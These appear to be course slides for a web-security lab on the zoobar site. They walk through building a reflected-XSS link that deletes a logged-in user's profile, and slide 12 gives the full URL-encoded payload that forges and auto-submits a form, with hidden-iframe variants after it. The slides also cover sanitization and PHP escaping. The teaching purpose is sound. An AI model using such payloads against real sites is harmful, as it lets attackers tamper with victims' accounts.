Slide 4: The four attacks

  A: Cookie Theft
    - Use URL encoding
    - Could hijack session
  B: Request Forgery
    - Navigate browser
    - Use iframes, forms
  C: Password Theft
    - Evade sanitization
    - Handle DOM events
  D: Profile Worm
    - Persistent attack
    - Replicates

  [Diagram: attack flows between email, zoobar.org (link, form), badguy.com and a stanford.edu redirect]
Slide 5: Sanitization

  Works differently depending on context.

  Quoted context ("attackstring"):
    - Attack: Break out with ' "
    - Defense: escape quotes with \

  Tag context (attackstring between tags):
    - Attack: Launch script with <script>
    - Attack: Close off parent tag
    - Defense: escape angle brackets

  Code context (eval( attackstring )):
    - Attack: Do whatever you want
    - Defense: Don't do that
Slide 6: Example: Profile Deleter

  - Malicious hyperlink deletes profile of user who clicks it
  - Only works when user logged in
    - User might have multiple tabs open
    - Might have chosen/forgotten not to log out
    - Might appear in another user's profile
  - Uses vulnerability in users.php from Attack A
  - Constructs profile deletion form and submits it ???
Slide 7: Find vulnerability

  - Site reflects query parameter in input field
  - Link can include anything we want here
Slide 8: Copy form data

  - View source to find form fields
  - Create copycat form with our modifications
Slide 9: Build the link

  - Close previous form tag
  - Button click triggers form submit
  - URL encode:
      http://scriptasylum.com/tutorials/encdec/encode-decode.html
      http://www.dommermuth-1.com/protosite/experiments/encode/index.html
Slide 12: Final Test

  - users.php replaced with index.php
  - Profile deleted

  http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform %0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C% 2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22 Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28 %29%3C%2Fscript%3E
Slide 13: Stealthier approaches

  - Post form into hidden iframe …
  - Open page with form in hidden iframe …
      document.myframe.contentDocument.forms.profile_update.value = "";
Slide 15: Goals

  Learn:
    - How easy it is to make mistakes
    - That even simple code can be hard to secure
    - Techniques for appropriate input validation
    - PHP
    - Very basic SQL
  A little programming knowledge can be a dangerous thing
Slide 16: File structure

  index.php
  users.php
  transfer.php
  login.php
  includes/
    auth.php (cookie authentication)
    common.php (includes everything else)
    navigation.php (site template)
  db/
    zoobar/
      Person.txt (must be writable by web server)
  Includes /usr/class/cs155/projects/pp2/txt-db-api/…
  Only edit these files
Slide 17: txt-db-api

  - Third-party text file database library
  - Data can be int, string, and autoincrement
  - Need to escape strings: \' \" \\
    - Actually magic_quotes_gpc does this for us

      $recipient = $_POST['recipient'];   // already escaped by magic_quotes_gpc
      $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
      $rs = $db->executeQuery($sql);
      if ($rs->next())
          $id = $rs->getCurrentValueByName('PersonID');
Slide 18: Defenses to Part 1

  A: Cookie Theft
  B: Request Forgery Attack
  C: Password Theft
  D: Profile Worm
Slide 19: PHP Sanitization Techniques

  addslashes(string)
    - Prepends backslash to ' " \
    - Already done by magic_quotes_gpc
    - Inverse: stripslashes(string)
  htmlspecialchars(string [, quote_style])
    - Converts &, ", < and > to HTML entities
    - Use ENT_QUOTES to change ' to &#039;
  strip_tags(string [, allowable_tags])
    - Max tag length 1024
    - Does not sanitize tag properties
  preg_replace(pattern, replacement, subject)
  More info: http://php.net
Slide 20: More XSS hunting

  - Look for untrusted input used as output
  - Note sanitization already applied to each variable
    - Form data has magic_quotes_gpc, db data does not
  - Sanitize the output if necessary
    - No penalty for erring on the side of caution
    - But sanitizing multiple times may lead to problems
  - No credit for solving non-goals: SQL injection, etc.
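An added example (not code from the slides or the zoobar project) of output escaping for the reflected users.php field, covering the htmlspecialchars/strip_tags notes from slide 19 and the two slide 20 pitfalls (magic_quotes_gpc backslashes on form data, sanitizing twice). Function names are hypothetical; PHP 5-era behaviour (magic_quotes_gpc on, htmlspecialchars default ENT_COMPAT) is assumed.

```php
<?php
// Escape for HTML body text and for double- or single-quoted attributes.
function escape_html($s) {
    // ENT_QUOTES also converts ' (to &#039;); the pre-8.1 default only
    // handles ", which is not enough inside a single-quoted attribute.
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// Form data arrives backslash-escaped by magic_quotes_gpc; database rows
// do not. Undo that one layer, then apply the HTML escaping exactly once.
function form_value_for_html($s) {
    return escape_html(stripslashes($s));
}
function db_value_for_html($s) {
    return escape_html($s);
}

// Constructed input in the shape of a reflected-parameter payload:
// a quote closes the attribute, then markup follows.
$reflected = '"></form><script>alert(1)</script>';

$out = array();

// Unsafe (what a reflecting users.php does): the quote ends the value.
$out['unsafe'] = '<input name="user" value="' . $reflected . '">';

// Safe: " < > become entities, so the browser sees one long attribute value.
$out['safe'] = '<input name="user" value="' . escape_html($reflected) . '">';

// strip_tags() is not a substitute in attribute context: it removes the
// tags but keeps the leading " and > that break out of value="...".
$out['still_unsafe'] = '<input name="user" value="' . strip_tags($reflected) . '">';
// -> value="">alert(1)">

// Pitfall 1: escaping form data without stripslashes shows the backslash.
$posted = "O\\'Brien";                               // as $_POST delivers it
$out['wrong'] = escape_html($posted);                // O\&#039;Brien
$out['right'] = form_value_for_html($posted);        // O&#039;Brien

// Pitfall 2: escaping twice turns &lt; into &amp;lt;, shown literally.
$out['once']  = escape_html('a < b');                // a &lt; b
$out['twice'] = escape_html(escape_html('a < b'));   // a &amp;lt; b

foreach ($out as $name => $html) {
    echo $name, ': ', $html, "\n";
}
```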